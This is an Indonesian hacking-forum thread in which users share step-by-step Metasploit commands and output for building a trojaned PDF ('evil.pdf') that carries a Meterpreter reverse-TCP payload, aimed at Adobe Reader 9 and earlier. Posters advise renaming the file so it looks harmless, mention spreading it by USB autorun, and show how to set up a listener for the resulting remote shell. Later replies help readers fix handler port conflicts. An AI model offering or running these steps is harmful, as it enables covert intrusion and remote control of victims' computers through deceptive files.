Hacking Windows Menggunakan USB + Social Engineering Toolkit

**u5h4nt** · 09-13-2011, 11:52 PM

mungkin bikin file PDF nya bisa cara lain !!!

Code:
root@RR12:~# msfconsole

msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe

msf  exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp

msf  exploit(adobe_pdf_embedded_exe) > set INFILENAME /root/filePDF.pdf

msf  exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.88.129

msf  exploit(adobe_pdf_embedded_exe) > set LPORT 4444

msf  exploit(adobe_pdf_embedded_exe) > exploit

[*] Reading in '/root/filePDF.pdf'...

[*] Parsing '/root/filePDF.pdf'...

[*] Parsing Successful.

[*] Using 'windows/meterpreter/reverse_tcp' as payload...

[*] Creating 'evil.pdf' file...

[*] Generated output file [*] Reading in '/root/filePDF.pdf'...

[*] Parsing '/root/filePDF.pdf'...

[*] Parsing Successful.

[*] Using 'windows/meterpreter/reverse_tcp' as payload...

[*] Creating 'evil.pdf' file...

[*] Generated output file /root/.msf4/data/exploits/evil.pdf

msf  exploit(adobe_pdf_embedded_exe) > 

msf  exploit(adobe_pdf_embedded_exe) >

jadi akan tercipta gabungan dari file pdf kita tadi yg namanya filePDF.pdf dengan payload exe .. gabungan itu namanya evil.pdf yg ada didirektori /root/.msf4/data/exploits/evil.pdf

tinggal diganti aja namanya sesuai dengan isi dari filePDF.pdf supaya tidak mencurigakan !!

kalo file autorun.inf nya kan ada contohnya diatas !!

klo udah kita tinggal listenning di port sesuai yg ditentukan diatas !!

Code:
root@RR12:~# msfconsole

msf > use exploit/multi/handler

msf  exploit(handler) > set LHOST 192.168.88.129

msf  exploit(handler) > exploit

yuupp mungkin langkah ini bisa jadi alternatif !!
NB : Hanya untuk versi Adobe Reader 9 kebawah !!

**Junior Riau** · 09-14-2011, 07:25 AM

(09-13-2011, 11:52 PM)RR12 Wrote: mungkin bikin file PDF nya bisa cara lain !!!

Code:
root@RR12:~# msfconsole msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /root/filePDF.pdf msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.88.129 msf exploit(adobe_pdf_embedded_exe) > set LPORT 4444 msf exploit(adobe_pdf_embedded_exe) > exploit [*] Reading in '/root/filePDF.pdf'... [*] Parsing '/root/filePDF.pdf'... [*] Parsing Successful. [*] Using 'windows/meterpreter/reverse_tcp' as payload... [*] Creating 'evil.pdf' file... [*] Generated output file [*] Reading in '/root/filePDF.pdf'... [*] Parsing '/root/filePDF.pdf'... [*] Parsing Successful. [*] Using 'windows/meterpreter/reverse_tcp' as payload... [*] Creating 'evil.pdf' file... [*] Generated output file /root/.msf4/data/exploits/evil.pdf msf exploit(adobe_pdf_embedded_exe) > msf exploit(adobe_pdf_embedded_exe) >

jadi akan tercipta gabungan dari file pdf kita tadi yg namanya filePDF.pdf dengan payload exe .. gabungan itu namanya evil.pdf yg ada didirektori /root/.msf4/data/exploits/evil.pdf

tinggal diganti aja namanya sesuai dengan isi dari filePDF.pdf supaya tidak mencurigakan !!

kalo file autorun.inf nya kan ada contohnya diatas !!

klo udah kita tinggal listenning di port sesuai yg ditentukan diatas !!

Code:
root@RR12:~# msfconsole msf > use exploit/multi/handler msf exploit(handler) > set LHOST 192.168.88.129 msf exploit(handler) > exploit

yuupp mungkin langkah ini bisa jadi alternatif !!
NB : Hanya untuk versi Adobe Reader 9 kebawah !!

nice

**THJC** · 09-14-2011, 08:33 PM

Nah... cakep om...
sekarang ane coba dulu ya Smile

Hmm kog di ane

Quote:msf exploit(handler) > set LHOST 192.168.2.7
LHOST => 192.168.2.7
msf exploit(handler) > exploit

[-] Handler failed to bind to 192.168.2.7:4444
[-] Handler failed to bind to 0.0.0.0:4444
[-] Exploit exception: The address is already in use (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
msf exploit(handler) >

Kenapa ya?

**u5h4nt** · 09-14-2011, 10:39 PM

(09-14-2011, 08:33 PM)THJC Wrote: Nah... cakep om...
sekarang ane coba dulu ya
Hmm kog di ane

Quote:msf exploit(handler) > set LHOST 192.168.2.7
LHOST => 192.168.2.7
msf exploit(handler) > exploit

[-] Handler failed to bind to 192.168.2.7:4444
[-] Handler failed to bind to 0.0.0.0:4444
[-] Exploit exception: The address is already in use (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
msf exploit(handler) >

Kenapa ya?

coba di set payload nya om !!!
jadi

Code:
msf > use exploits/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST <sesuai IP saat buat BD>

msf exploit(handler) > set LPORT <sesuai Port saat buat BD>

msf exploit(handler) > exploit

iKONspirasi · 09-14-2011, 10:52 PM

itu port 4444 udh dipake exploit yg sbelumnya bro, matiin dulu exploit sebelumnya atau ganti port misal: set LPORT 999

**THJC** · 09-14-2011, 11:51 PM

IP itu IP kita kan om?

iya om, ternyata di terminal 1 lagi.. lagi buka port 4444 Smile

**u5h4nt** · 09-15-2011, 12:54 AM

iya IP kita !!! pantesaann aja ternyata lagi ada aktifitas nakal lai di pintu itu !! heheheh !! yg di bilang om Konspirasi tuuhh betull bangeedd !!! hehehhe om Konspirasi selalu hadir menyelesaikan masalah !!! heheeh thanks Om !!

iKONspirasi · 09-15-2011, 01:33 AM

hehehe kita kan saling share disini bro Smile

**SourceCode** · 11-01-2011, 11:47 PM

sadiiiiiiiiiiiiiisss...
tapi pengen cobaaa...
mas, gimana cara lihat ip address komputer kita ya?

**cassaprodigy** · 11-02-2011, 07:09 AM

(11-01-2011, 11:47 PM)SourceCode Wrote: sadiiiiiiiiiiiiiisss...
tapi pengen cobaaa...
mas, gimana cara lihat ip address komputer kita ya?

belum bisa kah melihat ip di komputer anda ? ..

1. jika om melihat ip di jaringan local gunakan perintah

#ifconfig [interface]

2. untuk melihat ip publik klo memang main dengan ip pub .. bisa ke sini

http://www.whatismyip.com/